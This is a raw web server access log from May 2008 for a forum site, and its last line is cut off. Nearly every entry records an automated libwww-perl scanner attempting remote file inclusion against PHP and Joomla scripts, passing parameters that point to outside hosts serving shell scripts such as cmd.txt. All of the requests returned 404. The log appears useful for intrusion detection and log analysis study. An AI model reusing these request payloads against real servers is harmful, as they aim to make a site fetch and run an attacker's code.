62.75.184.206 - - [11/May/2008:18:54:49 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
208.82.181.6 - - [11/May/2008:18:55:41 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
208.82.181.6 - - [11/May/2008:18:55:41 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
208.82.181.6 - - [11/May/2008:18:55:41 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.19.6.34 - - [11/May/2008:18:56:21 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://www.vestainforma.it/dmdocuments_orig/files/photos/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
86.109.96.33 - - [11/May/2008:18:56:46 -0700] "GET /logs/board.php?see=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
86.109.96.33 - - [11/May/2008:18:56:46 -0700] "GET /board.php?see=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:57:45 -0700] "GET /logs/access_080303.log/db.php?path_local=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:57:46 -0700] "GET /db.php?path_local=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:57:46 -0700] "GET /logs/db.php?path_local=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:57:47 -0700] "GET /logs/access_080211.log/db.php?path_local=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
208.82.181.6 - - [11/May/2008:18:57:49 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
208.82.181.6 - - [11/May/2008:18:57:49 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:18:58:08 -0700] "GET /logs/access_071126.log/board.php?see=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:18:58:08 -0700] "GET /board.php?see=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:18:58:08 -0700] "GET /logs/board.php?see=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:18:58:08 -0700] "GET /logs/access.log/board.php?see=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.188.60.54 - - [11/May/2008:18:58:18 -0700] "GET /logs//atom.php5?page=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.188.60.54 - - [11/May/2008:18:58:18 -0700] "GET //atom.php5?page=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.9.36.146 - - [11/May/2008:18:58:31 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://www.colmilitarnarino.edu.co/images/stories/food/on.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
221.143.48.33 - - [11/May/2008:18:58:50 -0700] "GET /logs/access_080303.log/send_reminders.php?includedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.collegiateforum.org"
221.143.48.33 - - [11/May/2008:18:58:50 -0700] "GET /send_reminders.php?includedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.collegiateforum.org"
221.143.48.33 - - [11/May/2008:18:58:51 -0700] "GET /logs/send_reminders.php?includedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-pe